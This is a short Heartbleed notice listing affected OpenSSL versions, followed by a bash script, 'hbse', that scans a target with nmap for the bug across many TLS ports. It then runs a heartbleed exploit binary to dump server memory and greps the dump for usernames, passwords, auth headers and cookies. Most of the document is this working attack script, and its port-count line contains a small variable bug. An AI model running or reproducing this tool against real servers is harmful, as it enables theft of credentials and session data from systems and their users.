# Heartbleed
#Affected OpenSSL versions
#The affected versions of OpenSSL are OpenSSL 1.0.1 through 1.0.1f (inclusive).
#Later versions (1.0.1g and ulterior) and previous versions (1.0.0 branch and older) are not vulnerable.
#Installations of the affected versions are vulnerable unless OpenSSL was compiled with OPENSSL_NO_HEARTBEATS.
# Scan and exploit
# ./hbse 127.0.0.1 # Interactive mode.
# ./hbse --scan 127.0.0.1 # No interactive mode. Scan only.
# ./hbse --exploit 127.0.0.1 # No interactive mode. Scan and exploit.
# cat hbse
#!/bin/bash
### TCP ####
# 443 (HTTPS - HTTP over SSL)
# 465 (SMTPS - SMTP over SSL)
# 563 (NNTPS - NNTP over TLS/SSL)
# 636 (LDAPS - LDAP over TLS/SSL)
# 989 (FTPS Data - FTP Data over TLS/SSL)
# 990 (FTPS Control - FTP Control over TLS/SSL)
# 992 (Telnet over TLS/SSL)
# 993 (IMAPS - IMAP over SSL)
# 995 (POP3S - POP3 over SSL)
# 1194 (OpenVPN)
# 2484 (Oracle Database listening for SSL client)
# 5061 (SIP over TLS)
# 8443 (Apache Tomcat SSL)
### UDP ###
# 563 (NNTPS - NNTP over TLS/SSL)
# 636 (LDAPS - LDAP over TLS/SSL)
# 4433 (OpenSSL)
if [ $# -eq 1 ]; then
ip="$1"
elif [ $# -eq 2 ]; then
se="$1"
ip="$2"
else
exit
fi
nports="T:443,465,563,636,989,990,992,993,995,1194,2484,5061,8443,U:563,636,4433"
function print() {
text="$1"
color="$2"
if [ "$color" == "gray" ]; then
header="\e[38;5;250m"
elif [ "$color" == "red" ]; then
header="\e[91m"
elif [ "$color" == "green" ]; then
header="\e[92m"
elif [ "$color" == "yellow" ]; then
header="\e[93m"
fi
tail="\e[0m"
echo -en $header$text$tail
}
print "Checking if $ip is vulnerable on port 443... " "gray"
vulnerable="`nmap -p T:443 -script ssl-heartbleed $ip | grep VULNERABLE`"
if [ "$vulnerable" != "" ]; then
print "Yes\n" "green"
print "Checking if it is vulnerable on other ports... " "gray"
vports="`nmap -p $nports -script ssl-heartbleed $ip | grep -B 2 VULNERABLE: | grep open | awk -F'/' '{print $1}'`"
n="`echo "$ports" | wc -l`"
if [ "$n" == 1 ]; then
print "No\n" "red"
w1="port"
w2="it"
w3="file"
else
print "Yes\n" "green"
w1="ports"
w2="them"
w3="files"
fi
print "Vulnerable $w1:\n" "gray"
print "$vports\n" "green"
if [ "$se" == "--scan" ]; then exit
elif [ "$se" == "--exploit" ]; then
answer="Y"
else
print "Do you want to exploit $w2? [Yn] " "gray"
read answer
fi
if [ "$answer" = "Y" ]; then
print "Exploit: dumping 64KB on vulnerable $w1...\n" "gray"
exec 3<<< "$vports"
while read port <&3; do
print "+ Port [$port]\n" "gray"
ofile="$ip.$port"
if [ -f $ofile ]; then rm -f $ofile; fi
if [ "$port" == "465" ]; then
precmd='-c 0'
elif [ "$port" == "993" ]; then
precmd='-c 2'
elif [ "$port" == "995" ]; then
precmd='-c 1'
else
precmd=''
fi
./heartbleed -s $ip -p $port -f $ofile $precmd -t 1 > /dev/null 2>&1
if [ -f $ofile ]; then
r="`strings $ofile | grep -i -e user -e pass -e login -e auth -e cookie -e basic`"
print "$r\n" "green"
if [ "$se" != "--exploit" ]; then
print "Do you want to less the hexdump file? [Yn] " "gray"
read answer
if [ "$answer" = "Y" ]; then
hexdump -C $ofile | less
fi
fi
else
print "Error: heartbleed did not work on port $port...\n" "yellow"
fi
done
if [ "$se" != "--exploit" ]; then
print "Do you want to delete the hexdump $w3? [Yn] " "gray"
read answer
if [ "$answer" = "Y" ]; then
rm -f $ip.*
fi
fi
fi
else
print "No\n" "red"
fi